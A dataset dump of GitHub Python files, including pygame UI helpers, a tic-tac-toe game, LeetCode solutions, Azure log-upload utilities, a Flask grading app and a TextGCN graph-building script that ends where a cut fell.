y)\n\n t = idx / 500\n x = (1 - t) * save_x + t * hand_x[0]\n y = (1 - t) * save_y + t * hand_y[0]\n idx += 1\n if idx >= 500:\n idx = 0\n save_x, save_y = x, y\n hand_x.pop(0), hand_y.pop(0), hand_check.pop(0)\n else:\n character.clip_draw(frame * 100, 100 * 0, 100, 100, x, y)\n\n update_canvas()\n frame = (frame + 1) % 8\n handle_events()\n\nclose_canvas()\n","repo_name":"hgfsda/Drill06","sub_path":"move_character_with_mouse.py","file_name":"move_character_with_mouse.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20264362589","text":"'''\nGiven an array nums and a value val, remove all instances of that value in-place and return the new length.\n\nExample 1:\n\nGiven nums = [3,2,2,3], val = 3,\n\nYour function should return length = 2, with the first two elements of nums being 2.\n\nIt doesn't matter what you leave beyond the returned length.\n'''\n\n'''\nBrute force: go through the array, check if the value match \nthe target, remove that value => long runtime cause of the remove method \n\n2 Pointers method:\nset 2 pointers p1, p2 at the beginning of the list\nLoop through the nums list,\nIf p1 meet a value that not target, nums[p2] == nums[p1] then increase p2 by 1\nKeep doing that till reaching the end of the list.\nReturn the value of p2 \n[0,1,3,0,4,0,4,2] \n i\n s\n'''\n\n\ndef removeElement(nums, val):\n l = len(nums)\n s = 0\n for i in range(l):\n if nums[i] != val:\n nums[s] = nums[i]\n s += 1\n return s\n","repo_name":"bghoang/coding-challenge-me","sub_path":"leetcode/TwoPointerMethod/removeElement.py","file_name":"removeElement.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15714208629","text":"# -*- coding: utf-8 -*-\n\nimport pygame\nfrom enum import Enum\n\nclass PGAction(Enum):\n CLICKED = 1\n OVER = 0\n\nclass PGElement:\n priority = 0\n surface = None\n rect = pygame.Rect((0,0,0,0))\n visible = True\n overed = False\n\n def event_check(self, events: list):\n for event in events:\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1: \n if self.rect.collidepoint(event.pos):\n return PGAction.CLICKED\n if event.type == pygame.MOUSEMOTION:\n if self.rect.collidepoint(event.pos):\n self.overed = True\n else:\n self.overed 
= False\n return None\n\n def draw(self, screen: pygame.Surface, frame_count: int):\n if self.visible:\n screen.blit(self.surface, (self.rect[0], self.rect[1]))\n \n def _relative_to_absolute(self, rel_rect):\n \"\"\" Return absolute coordinate based on relative coordinate and display size\"\"\"\n display_info = pygame.display.Info()\n current_w = display_info.current_w\n current_h = display_info.current_h\n transform_v = (current_w, current_h,current_w, current_h)\n abs_rect = pygame.Rect(tuple((ratio * transform_v[i] for i, ratio in enumerate(rel_rect))))\n return abs_rect\n\n def _resize(self, new_size, absolute = True):\n display_info = pygame.display.Info()\n current_w = display_info.current_w\n current_h = display_info.current_h\n if not absolute:\n new_w = int(new_size[0] * current_w)\n new_h = int(new_size[1] * current_h)\n new_size = (new_w, new_h)\n self.surface = pygame.transform.scale(self.surface, new_size)\n\nclass PGEmptyButton(PGElement):\n def __init__(self, rect, absolute = True):\n self.rect = pygame.Rect(rect)\n if not absolute:\n self.rect = pygame.Rect((self._relative_to_absolute(rect)))\n self.visible = False\n \n def draw(self, screen, frame_count):\n if self.visible:\n pygame.draw.rect(screen, (0,0,0), self.rect, 3)\n\nclass PGImage(PGElement):\n priority = 1\n def __init__(self, path: str, rect, absolute: bool = True):\n self.surface = pygame.image.load(path)\n self.rect = pygame.Rect(rect)\n if not absolute:\n self.rect = pygame.Rect((self._relative_to_absolute(rect)))\n self._resize((rect[2], rect[3]), absolute)\n \n\nclass PGLabel(PGElement):\n priority = 2\n def __init__(self, location: tuple, text: str = \"\", font_size: int = 8, font = None, color=(0,0,0), absolute: bool = False):\n font = pygame.font.Font(font, font_size)\n self.surface = font.render(text, 1, color)\n self.rect = location + (self.surface.get_size())\n if not absolute:\n self.rect = pygame.Rect(self._relative_to_absolute(self.rect))\n\nclass PGBackground(PGElement):\n def __init__(self, location):\n self.surface = pygame.image.load(location)\n displayInfo = pygame.display.Info()\n self.surface = pygame.transform.scale(self.surface, (displayInfo.current_w, displayInfo.current_h))\n self.rect = (0,0) + (displayInfo.current_w, displayInfo.current_h)\n\n\ndef drawElements(screen, elements, frame_count: int = 0):\n \"\"\" Draw given element on screen base on their priority value \"\"\"\n screen.fill((255,255,255))\n for element in sorted(elements, key=lambda x: x.priority):\n element.draw(screen, frame_count)\n pygame.display.flip()","repo_name":"CENSONtechnology/linto-wuw-booth","sub_path":"pgelement.py","file_name":"pgelement.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74364475618","text":"from IPython.display import clear_output\r\n\r\nimport random\r\n\r\ndef display_board(board):\r\n\t\"\"\"\r\n\tprint board game\r\n\t\"\"\"\r\n\t#clear_output()\r\n\tprint(board[7] + ' | ' + board[8] + ' | ' + board[9])\r\n\tprint('---------')\r\n\tprint(board[4] + ' | ' + board[5] + ' | ' + board[6])\r\n\tprint('---------')\r\n\tprint(board[1] + ' | ' + board[2] + ' | ' + board[3])\r\n\tprint('\\n\\n')\r\n\r\ndef player_input():\r\n\t\"\"\"\r\n\tWrite a function that can take in a player input and assign their marker as 'X' or 'O'\r\n\t\"\"\"\r\n\tmarkerset = ''\r\n\tmarker = ''\r\n\twhile not (marker == 'X' or marker == 'O'):\r\n\t\tmarker = input('Player 1: Do you want to be X or 
O?').upper()\r\n\t\tif(marker == 'X'):\r\n\t\t\tmarkerset = ('X','O')\r\n\t\telse:\r\n\t\t\tmarkerset = ('O','X')\r\n\tclear_output()\r\n\tprint(f'Player 1: Do you want to be X or O? {markerset[0]}')\r\n\tprint(f'Player 2: Do you want to be X or O? {markerset[1]}')\r\n\treturn markerset\r\n\r\ndef place_marker(board, marker, position):\r\n\t\"\"\"\r\n\tfunction that takes in the board list object, a marker ('X' or 'O'), and a desired position (number 1-9) and assigns it to the board.\r\n\t\"\"\"\r\n\tboard[position] = marker\r\n\r\ndef win_check(board, mark):\r\n\t\"\"\"\r\n\tfunction that takes in a board and a mark (X or O) and then checks to see if that mark has won.\r\n\t\"\"\"\r\n\treturn ((board[1] == mark and board[2] == mark and board[3] == mark) or\r\n\t(board[4] == mark and board[5] == mark and board[6] == mark) or\r\n\t(board[7] == mark and board[8] == mark and board[9] == mark) or\r\n\t(board[1] == mark and board[4] == mark and board[7] == mark) or\r\n\t(board[2] == mark and board[5] == mark and board[8] == mark) or\r\n\t(board[3] == mark and board[6] == mark and board[9] == mark) or\r\n\t(board[1] == mark and board[5] == mark and board[9] == mark) or\r\n\t(board[7] == mark and board[5] == mark and board[3] == mark))\r\n\r\ndef choose_first():\r\n\t\"\"\"\r\n\trandomly decide which player goes first\r\n\t\"\"\"\r\n\tfirst = random.randint(1,2)\r\n\tprint(f'Player {first} will go first')\r\n\treturn first\r\n\r\ndef space_check(board, position):\r\n\t\"\"\"\r\n\tfunction that returns a boolean indicating whether a space on the board is freely available.\r\n\t\"\"\"\r\n\treturn (board[position] == ' ')\r\n\r\ndef full_board_check(board):\r\n\t\"\"\"\r\n\t function that checks if the board is full and returns a boolean value\r\n\t\"\"\"\r\n\tfor x in range(1,10):\r\n\t\tif(space_check(board,x) == True):\r\n\t\t\treturn False\r\n\treturn True\r\n\r\ndef player_choice(board):\r\n\t\"\"\"\r\n\t function that asks for a player's next position and checks if the position is available\r\n\t\"\"\"\r\n\twhile(True):\r\n\t\tpos = int(input('Choose your next position (1-9)'))\r\n\t\tif(space_check(board,pos)==True):\r\n\t\t\treturn pos\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef replay():\r\n\t\"\"\"\r\n\tfunction that asks the player if they want to play again\r\n\t\"\"\"\r\n\twhile(True):\r\n\t\treplay = input('Do you want to play again? Y/N')\r\n\t\tif(replay.lower() == 'y'):\r\n\t\t\tclear_output()\r\n\t\t\treturn True\r\n\t\telif(replay.lower() == 'n'):\r\n\t\t\tclear_output()\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\n\r\n#GAME\r\n\r\nprint('Welcome to Tic Tac Toe!')\r\n\r\nwhile True:\r\n # Set the game up here\r\n board = [' '] * 10\r\n markset = player_input()\r\n first = choose_first()\r\n \r\n play = input('Are you ready to Play? Y/N')\r\n if(play.lower() == 'y'):\r\n game_on = True\r\n else:\r\n game_on = False\r\n \r\n #pass\r\n while game_on:\r\n if(first == 1):\r\n #Player 1 Turn\r\n display_board(board)\r\n pos = player_choice(board)\r\n place_marker(board,markset[0],pos)\r\n if(win_check(board,markset[0])==True):\r\n display_board(board)\r\n print('Yayyy Player1!! You\\'ve won the game!')\r\n game_on = False\r\n else:\r\n if(full_board_check(board) == True):\r\n display_board(board)\r\n print('It\\'s a draw!!')\r\n game_on = False\r\n else:\r\n first = 2\r\n else:\r\n \r\n # Player2's turn.\r\n display_board(board)\r\n pos = player_choice(board)\r\n place_marker(board,markset[1],pos)\r\n if(win_check(board,markset[1])==True):\r\n display_board(board)\r\n print('Yayyy Player2!! 
You\\'ve won the game!')\r\n game_on = False\r\n else:\r\n if(full_board_check(board)==True):\r\n display_board(board)\r\n print('It\\'s a draw!!')\r\n game_on = False\r\n else:\r\n first = 1\r\n #pass\r\n #print('Yayyy Player{first}!! You\\'ve won the game!')\r\n if not replay():\r\n break","repo_name":"GurpartapG/TikTacToe","sub_path":"TIkTakToe.py","file_name":"TIkTakToe.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"14974598646","text":"\"\"\"\nYour task is to calculate a^b mod 1337 where a is a positive integer and b is an extremely large positive integer given in the form of an array.\n\nExample1:\n\na = 2\nb = [3]\n\nResult: 8\nExample2:\n\na = 2\nb = [1,0]\n\nResult: 1024\nCredits:\nSpecial thanks to @Stomach_ache for adding this problem and creating all test cases.\n\"\"\"\n\nclass Solution:\n def superPow(self, a, b):\n \"\"\"\n :type a: int\n :type b: List[int]\n :rtype: int\n \"\"\"\n result = 1\n for n in b[::-1]:\n result = result * a ** n % 1337\n a = a ** 10 % 1337\n return result","repo_name":"ipudu/leetcode","sub_path":"solutions/372_super-pow.py","file_name":"372_super-pow.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"}
{"seq_id":"11514656045","text":"from shutil import rmtree\n\nfrom blob_operations import Blob_Operation\n\nfrom utils.logger import App_Logger\nfrom utils.read_params import read_params\n\n\nclass Main_Utils:\n def __init__(self):\n self.class_name = self.__class__.__name__\n\n self.blob = Blob_Operation()\n\n self.log_writer = App_Logger()\n\n self.config = read_params()\n\n self.log_dir = self.config[\"log_dir\"]\n\n self.dir = self.config[\"dir\"]\n\n def upload_logs(self):\n method_name = self.upload_logs.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, \"upload\")\n\n try:\n self.blob.upload_folder(self.log_dir, \"upload\")\n\n self.log_writer.log(\"Uploaded logs to logs container\", \"upload\")\n\n self.log_writer.start_log(\"exit\", self.class_name, method_name, \"upload\")\n\n rmtree(self.log_dir)\n\n except Exception as e:\n self.log_writer.exception_log(e, self.class_name, method_name, \"upload\")\n\n def get_filename(self, key, fname, log_file):\n method_name = self.get_filename.__name__\n\n self.log_writer.start_log(\"start\", self.class_name, method_name, log_file)\n\n try:\n pred_fname = self.dir[key] + \"/\" + fname\n\n self.log_writer.log(f\"Got the pred file name for {key}\", log_file)\n\n self.log_writer.start_log(\"exit\", self.class_name, method_name, log_file)\n\n return pred_fname\n\n except Exception as e:\n self.log_writer.exception_log(e, self.class_name, method_name, log_file)\n","repo_name":"sethusaim/Visibility-Climate-Kubernetes-Azure","sub_path":"raw_pred_data_validation/utils/main_utils.py","file_name":"main_utils.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"72551365218","text":"import csv\nimport json\n\nfrom model import preprocess_text\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n # Read questions from the CSV file\n questions = []\n with open('questions.csv', 'r') as file:\n reader = csv.DictReader(file)\n for row in reader:\n questions.append(row['question'])\n\n return 
render_template('index.html', questions=questions)\n\n\n# Load the pickled model\nwith open('model.pkl', 'rb') as file:\n model = pickle.load(file)\n\n\n# Define the route for handling predictions\n@app.route('/predict', methods=['POST'])\ndef predict():\n # Retrieve the answers from the request\n answers = request.json['answers']\n\n # Preprocess the answers\n preprocessed_answers = [preprocess_text(answer) for answer in answers]\n\n # Make predictions using the model\n results = []\n for answer, preprocessed_answer in zip(answers, preprocessed_answers):\n prediction = model.predict([preprocessed_answer]) # Pass the processed answer as a list\n prediction_list = prediction.tolist() # Convert NumPy array to list\n results.append((answer, prediction_list))\n\n # Return the results as JSON\n return json.dumps(results)\n\n\n# Define the route for rendering the HTML page\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Abdelbar-Terbachi/Arabic-answer-grading-model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74453785377","text":"import time\n\nfrom graph.algorithms import ColorDirectedGraph\nfrom parametrized.helpers.HOPermutationSignatures import HOPermutationSignatures\nfrom parametrized.helpers.PermutationSignatureApplier import PermutationSignatureApplier\n\n\nclass BruteColoringAlgorithm:\n def __init__(self):\n pass\n\n def run(self, original_graph):\n cyclic_graphs = 0\n acyclic_graphs = 0\n # count = -1\n\n minimum_chromatic_number = None\n minimum_permutation_signature = None\n\n permutations = HOPermutationSignatures(original_graph)\n undirected_edges = original_graph.vertex_tuples_to_edges.keys()\n\n for perm in permutations:\n # count += 1\n # print(f\"\\rPermutation {count}/{2 ** (len(perm)) - 1}\", end='')\n with PermutationSignatureApplier(original_graph, perm, undirected_edges):\n is_acyclic, topological_sort = original_graph.is_acyclic()\n\n ColorDirectedGraph().run(topological_sort)\n\n if is_acyclic:\n ColorDirectedGraph().run(topological_sort)\n acyclic_graphs += 1\n else:\n cyclic_graphs += 1\n continue\n\n chromatic_numer = original_graph.tags_to_vertices['t'].get_color()\n # print(f'Chromatic number: {chromatic_numer}')\n\n if not minimum_chromatic_number or chromatic_numer < minimum_chromatic_number:\n minimum_chromatic_number = chromatic_numer\n minimum_permutation_signature = perm\n\n # print(\"\\n\")\n # print(f\"{cyclic_graphs} out of {cyclic_graphs + acyclic_graphs} graph(s) was/were cyclic.\")\n # print(\n # f\"Minimum permutation: {minimum_permutation_signature}, it's chromatic number: {minimum_chromatic_number}\")\n\n with PermutationSignatureApplier(original_graph, minimum_permutation_signature, undirected_edges):\n order = original_graph.is_acyclic()[1]\n ColorDirectedGraph().run(order)\n","repo_name":"Vilkucis/dw-magr-2023","sub_path":"src/brute/brute.py","file_name":"brute.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8318387320","text":"import os\nimport random\nimport numpy as np\nimport pickle as pkl\nimport networkx as nx\nimport scipy.sparse as sp\nfrom utils import loadWord2Vec, clean_str\nfrom math import log\nfrom sklearn import svm\nfrom nltk.corpus import wordnet as wn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport sys\nfrom scipy.spatial.distance import 
cosine\n\nif len(sys.argv) != 2:\n\tsys.exit(\"Use: python build_graph.py <dataset>\")\n\ndatasets = ['20ng', 'R8', 'R52', 'ohsumed', 'mr']\n# build corpus\ndataset = sys.argv[1]\n\nif dataset not in datasets:\n\tsys.exit(\"wrong dataset name\")\n\n\n\n\n'''\n************************************\n Does Not Use Pre-trained Word Vectors\n************************************\n'''\nword_embeddings_dim = 50\nword_vector_map = {}\n\n\n\n'''\n************************************\n Read Pre-trained Word Vectors\n************************************\n'''\n# word_vector_file = 'data/glove.6B/glove.6B.300d.txt'\n# word_vector_file = 'data/corpus/' + dataset + '_word_vectors.txt'\n# _, embd, word_vector_map = loadWord2Vec(word_vector_file)\n# word_embeddings_dim = len(embd[0])\n\n\n\n\n#******************************************************************************#\n# 1.load the train data and test data, and shuffle them #\n#******************************************************************************#\n# load the sample name of train(test) data\ndoc_name_list = []\ndoc_train_list = []\ndoc_test_list = []\n\nf = open('data/' + dataset + '.txt', 'r')\nlines = f.readlines()\nfor line in lines:\n doc_name_list.append(line.strip())\n temp = line.split(\"\\t\")\n if temp[1].find('test') != -1:\n doc_test_list.append(line.strip())\n elif temp[1].find('train') != -1:\n doc_train_list.append(line.strip())\nf.close()\n\n\n# load the sample content, the sample order in XXX.clean.txt is the same as that of doc_name_list\ndoc_content_list = []\nf = open('data/corpus/' + dataset + '.clean.txt', 'r')\nlines = f.readlines()\nfor line in lines:\n doc_content_list.append(line.strip())\nf.close()\n\n# Find the index of each doc_train_list sample in doc_name_list, store the indices in train_ids, then shuffle train_ids\ntrain_ids = []\nfor train_name in doc_train_list:\n train_id = doc_name_list.index(train_name)\n train_ids.append(train_id)\nrandom.shuffle(train_ids)\n\n# partial labeled data\n#train_ids = train_ids[:int(0.2 * len(train_ids))]\n\n# Write the shuffled train_ids to a file\ntrain_ids_str = '\\n'.join(str(index) for index in train_ids)\nf = open('data/' + dataset + '.train.index', 'w')\nf.write(train_ids_str)\nf.close()\n\n# Find the index of each doc_test_list sample in doc_name_list, store the indices in test_ids, then shuffle test_ids\ntest_ids = []\nfor test_name in doc_test_list:\n test_id = doc_name_list.index(test_name)\n test_ids.append(test_id)\n\nrandom.shuffle(test_ids)\n\n# Write the shuffled test_ids to a file\ntest_ids_str = '\\n'.join(str(index) for index in test_ids)\nf = open('data/' + dataset + '.test.index', 'w')\nf.write(test_ids_str)\nf.close()\n\n# ids holds the indices of both the training set and the test set\nids = train_ids + test_ids\n\n\n# Reorder doc_name_list and doc_content_list according to the shuffled train_ids/test_ids, producing shuffle_doc_name_list and shuffle_doc_words_list\nshuffle_doc_name_list = [] \nshuffle_doc_words_list = []\nfor id in ids:\n shuffle_doc_name_list.append(doc_name_list[int(id)])\n shuffle_doc_words_list.append(doc_content_list[int(id)])\n\n# Write shuffle_doc_name_list and shuffle_doc_words_list to files\nshuffle_doc_name_str = '\\n'.join(shuffle_doc_name_list)\nf = open('data/' + dataset + '_shuffle.txt', 'w')\nf.write(shuffle_doc_name_str)\nf.close()\nshuffle_doc_words_str = '\\n'.join(shuffle_doc_words_list)\nf = open('data/corpus/' + dataset + '_shuffle.txt', 'w')\nf.write(shuffle_doc_words_str)\nf.close()\n\n\n#******************************************************************************#\n# 2.build vocabulary #\n#******************************************************************************#\nword_freq = {}\nword_set = set()\nfor doc_words in 
shuffle_doc_words_list:\n words = doc_words.split()\n for word in words:\n word_set.add(word)\n if word in word_freq:\n word_freq[word] += 1\n else:\n word_freq[word] = 1\n\nvocab = list(word_set)\nvocab_size = len(vocab)\n\nword_doc_list = {} # dict: key = word, value = ids of the documents containing the word (indices into shuffle_doc_words_list)\nfor i in range(len(shuffle_doc_words_list)):\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n appeared = set()\n for word in words:\n if word in appeared:\n continue\n if word in word_doc_list:\n doc_list = word_doc_list[word]\n doc_list.append(i)\n word_doc_list[word] = doc_list\n else:\n word_doc_list[word] = [i]\n appeared.add(word)\n\nword_doc_freq = {} # dict: key = word, value = number of documents containing the word\nfor word, doc_list in word_doc_list.items():\n word_doc_freq[word] = len(doc_list)\n\nword_id_map = {} # dict: key = word, value = index of the word in vocab\nfor i in range(vocab_size):\n word_id_map[vocab[i]] = i\n\n# Write vocab to a file\nvocab_str = '\\n'.join(vocab)\nf = open('data/corpus/' + dataset + '_vocab.txt', 'w')\nf.write(vocab_str)\nf.close()\n\n'''\nWord definitions begin\n'''\n'''\ndefinitions = []\n\nfor word in vocab:\n word = word.strip()\n synsets = wn.synsets(clean_str(word))\n word_defs = []\n for synset in synsets:\n syn_def = synset.definition()\n word_defs.append(syn_def)\n word_des = ' '.join(word_defs)\n if word_des == '':\n word_des = '<PAD>'\n definitions.append(word_des)\n\nstring = '\\n'.join(definitions)\n\n\nf = open('data/corpus/' + dataset + '_vocab_def.txt', 'w')\nf.write(string)\nf.close()\n\ntfidf_vec = TfidfVectorizer(max_features=1000)\ntfidf_matrix = tfidf_vec.fit_transform(definitions)\ntfidf_matrix_array = tfidf_matrix.toarray()\nprint(tfidf_matrix_array[0], len(tfidf_matrix_array[0]))\n\nword_vectors = []\n\nfor i in range(len(vocab)):\n word = vocab[i]\n vector = tfidf_matrix_array[i]\n str_vector = []\n for j in range(len(vector)):\n str_vector.append(str(vector[j]))\n temp = ' '.join(str_vector)\n word_vector = word + ' ' + temp\n word_vectors.append(word_vector)\n\nstring = '\\n'.join(word_vectors)\n\nf = open('data/corpus/' + dataset + '_word_vectors.txt', 'w')\nf.write(string)\nf.close()\n\nword_vector_file = 'data/corpus/' + dataset + '_word_vectors.txt'\n_, embd, word_vector_map = loadWord2Vec(word_vector_file)\nword_embeddings_dim = len(embd[0])\n'''\n\n'''\nWord definitions end\n'''\n\n\n\n\n\n\n\n\n\n#******************************************************************************#\n# 3.record the set of label classes #\n#******************************************************************************#\nlabel_set = set()\nfor doc_meta in shuffle_doc_name_list:\n temp = doc_meta.split('\\t')\n label_set.add(temp[2])\nlabel_list = list(label_set)\n\n# Write label_list to a file\nlabel_list_str = '\\n'.join(label_list)\nf = open('data/corpus/' + dataset + '_labels.txt', 'w')\nf.write(label_list_str)\nf.close()\n\n\n\n\n\n\n\n\n\n\n\n#******************************************************************************#\n# 4. 
divide train_set into 90% real_train_set and 10% val_set #\n#******************************************************************************#\n# Take 90% of train_ids as the real training set; the remaining 10% is the validation set\ntrain_size = len(train_ids)\nval_size = int(0.1 * train_size)\nreal_train_size = train_size - val_size \n\n# Names of the samples that actually take part in training\nreal_train_doc_names = shuffle_doc_name_list[:real_train_size]\n\n# Write those sample names to a file\nreal_train_doc_names_str = '\\n'.join(real_train_doc_names)\nf = open('data/' + dataset + '.real_train.name', 'w')\nf.write(real_train_doc_names_str)\nf.close()\n\n\n\n#*******************************************************************************************************#\n# 5. build the training-set data the model can consume\n# x: matrix of size real_train_size*word_embeddings_dim; each row is a document embedding.\n# Without pre-trained word vectors the document embedding is all zeros; with pre-trained vectors it\n# is the sum of the embeddings of the words in the document.\n# y: matrix of size real_train_size*len(label_list); each row is the one-hot vector of the document's label\n#*******************************************************************************************************#\n\nrow_x = []\ncol_x = []\ndata_x = []\nfor i in range(real_train_size):\n doc_vec = np.array([0.0 for k in range(word_embeddings_dim)])\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n doc_len = len(words)\n for word in words:\n if word in word_vector_map: # word_vector_map: dict holding the pre-trained word vectors\n word_vector = word_vector_map[word]\n # print(doc_vec)\n # print(np.array(word_vector))\n doc_vec = doc_vec + np.array(word_vector)\n\n for j in range(word_embeddings_dim):\n row_x.append(i)\n col_x.append(j)\n # np.random.uniform(-0.25, 0.25)\n data_x.append(doc_vec[j] / doc_len) # doc_vec[j]/ doc_len\n\n# x = sp.csr_matrix((real_train_size, word_embeddings_dim), dtype=np.float32)\nx = sp.csr_matrix((data_x, (row_x, col_x)), shape=(real_train_size, word_embeddings_dim))\n\ny = []\nfor i in range(real_train_size):\n doc_meta = shuffle_doc_name_list[i]\n temp = doc_meta.split('\\t')\n label = temp[2]\n one_hot = [0 for l in range(len(label_list))]\n label_index = label_list.index(label)\n one_hot[label_index] = 1\n y.append(one_hot)\ny = np.array(y)\n# print(y)\n\n\n\n\n\n\n\n#*************************************************************************************************#\n# 6. 
build the test-set data the model can consume.\n# tx: matrix of size test_size*word_embeddings_dim; each row is a document embedding. \n# Without pre-trained word vectors the document embedding is all zeros; with pre-trained vectors it\n# is the sum of the embeddings of the words in the document.\n# ty: matrix of size test_size*len(label_list); each row is the one-hot vector of the document's label\n#*************************************************************************************************#\n\n# tx: feature vectors of test docs, no initial features\ntest_size = len(test_ids)\n\nrow_tx = []\ncol_tx = []\ndata_tx = []\nfor i in range(test_size):\n doc_vec = np.array([0.0 for k in range(word_embeddings_dim)])\n doc_words = shuffle_doc_words_list[i + train_size]\n words = doc_words.split()\n doc_len = len(words)\n for word in words:\n if word in word_vector_map:\n word_vector = word_vector_map[word]\n doc_vec = doc_vec + np.array(word_vector)\n\n for j in range(word_embeddings_dim):\n row_tx.append(i)\n col_tx.append(j)\n # np.random.uniform(-0.25, 0.25)\n data_tx.append(doc_vec[j] / doc_len) # doc_vec[j] / doc_len\n\n# tx = sp.csr_matrix((test_size, word_embeddings_dim), dtype=np.float32)\ntx = sp.csr_matrix((data_tx, (row_tx, col_tx)),\n shape=(test_size, word_embeddings_dim))\n\nty = []\nfor i in range(test_size):\n doc_meta = shuffle_doc_name_list[i + train_size]\n temp = doc_meta.split('\\t')\n label = temp[2]\n one_hot = [0 for l in range(len(label_list))]\n label_index = label_list.index(label)\n one_hot[label_index] = 1\n ty.append(one_hot)\nty = np.array(ty)\n# print(ty)\n\n\n\n\n#************************************************************************************************************************************#\n# 7. build the following variables:\n# allx: matrix of size (train_size + vocab_size)*word_embeddings_dim; the first train_size rows hold the document\n# embeddings, the following vocab_size rows hold the word vectors of the vocabulary. Without pre-trained\n# word vectors, the word vectors default to random initialization.\n# ally: matrix of size (train_size + vocab_size)*len(label_list); the first train_size rows hold the one-hot labels of the documents, the following vocab_size rows are all zero vectors\n#************************************************************************************************************************************#\n\n# allx: the feature vectors of both labeled and unlabeled training instances\n# (a superset of x)\n# unlabeled training instances -> words\n\nword_vectors = np.random.uniform(-0.01, 0.01, (vocab_size, word_embeddings_dim))\n\nfor i in range(len(vocab)):\n word = vocab[i]\n if word in word_vector_map:\n vector = word_vector_map[word]\n word_vectors[i] = vector\n\nrow_allx = []\ncol_allx = []\ndata_allx = []\n\nfor i in range(train_size):\n doc_vec = np.array([0.0 for k in range(word_embeddings_dim)])\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n doc_len = len(words)\n for word in words:\n if word in word_vector_map:\n word_vector = word_vector_map[word]\n doc_vec = doc_vec + np.array(word_vector)\n for j in range(word_embeddings_dim):\n row_allx.append(int(i))\n col_allx.append(j)\n # np.random.uniform(-0.25, 0.25)\n data_allx.append(doc_vec[j] / doc_len) # doc_vec[j]/doc_len\n\n\nfor i in range(vocab_size):\n for j in range(word_embeddings_dim):\n row_allx.append(int(i + train_size))\n col_allx.append(j)\n data_allx.append(word_vectors.item((i, j)))\n\n\nrow_allx = np.array(row_allx)\ncol_allx = np.array(col_allx)\ndata_allx = np.array(data_allx)\n\nallx = sp.csr_matrix(\n (data_allx, (row_allx, col_allx)), shape=(train_size + vocab_size, word_embeddings_dim))\n\nally = []\nfor i in range(train_size):\n doc_meta = shuffle_doc_name_list[i]\n temp = doc_meta.split('\\t')\n label = temp[2]\n one_hot = [0 for l in range(len(label_list))]\n label_index = label_list.index(label)\n 
one_hot[label_index] = 1\n ally.append(one_hot)\n\nfor i in range(vocab_size):\n one_hot = [0 for l in range(len(label_list))]\n ally.append(one_hot)\n\nally = np.array(ally)\n\nprint(x.shape, y.shape, tx.shape, ty.shape, allx.shape, ally.shape)\n\n\n\n\n\n\n\n\n#*************************************************************************************************************\n# 8. build the doc-word heterogeneous graph (adjacency matrix)\n#*************************************************************************************************************\n\n# word co-occurrence with context windows\nwindow_size = 20\nwindows = []\n\n'''\n Group the words of each document with a sliding window of size window_size and stride 1; the groups are stored in the list windows.\n For example windows[0]=['organization','university','maine'], windows[1]=['pin','map','din','cable']\n'''\nfor doc_words in shuffle_doc_words_list:\n words = doc_words.split()\n length = len(words)\n if length <= window_size:\n windows.append(words)\n else:\n # print(length, length - window_size + 1)\n for j in range(length - window_size + 1):\n window = words[j: j + window_size]\n windows.append(window)\n # print(window)\n\n'''\n word_window_freq: dict, key = word, value = number of windows containing the word\n'''\nword_window_freq = {}\nfor window in windows:\n appeared = set()\n for i in range(len(window)):\n if window[i] in appeared:\n continue\n if window[i] in word_window_freq:\n word_window_freq[window[i]] += 1\n else:\n word_window_freq[window[i]] = 1\n appeared.add(window[i])\n\n'''\n For each sliding window, count the ordered pairs formed by two distinct words and store them\n in the dict word_pair_count: key = the id pair of word 1 and word 2, value = number of windows containing that pair (the co-occurrence count within windows).\n \n For example, suppose the window obtained in the outer loop holds 6 words whose positions in the list are window=[0,1,2,3,4,5].\n Then the second and third loops handle the following position pairs in window:\n j-i\n 0-1\n 0-2\n 1-2\n 0-3\n 1-3\n 2-3\n 0-4\n 1-4\n 2-4\n 3-4\n 0-5\n 1-5\n 2-5\n 3-5\n 4-5\n'''\nword_pair_count = {}\nfor window in windows:\n for i in range(1, len(window)):\n for j in range(0, i):\n word_i = window[i]\n word_i_id = word_id_map[word_i]\n word_j = window[j]\n word_j_id = word_id_map[word_j]\n if word_i_id == word_j_id:\n continue\n # first ordering: a-b\n word_pair_str = str(word_i_id) + ',' + str(word_j_id)\n if word_pair_str in word_pair_count:\n word_pair_count[word_pair_str] += 1\n else:\n word_pair_count[word_pair_str] = 1\n # second ordering: b-a\n word_pair_str = str(word_j_id) + ',' + str(word_i_id)\n if word_pair_str in word_pair_count:\n word_pair_count[word_pair_str] += 1\n else:\n word_pair_count[word_pair_str] = 1\n\n\n\n'''\n Compute the PMI weight of each word-word edge\n'''\nrow = []\ncol = []\nweight = []\nnum_window = len(windows)\n\nfor key in word_pair_count:\n temp = key.split(',')\n i = int(temp[0]) # id of word 1\n j = int(temp[1]) # id of word 2\n count = 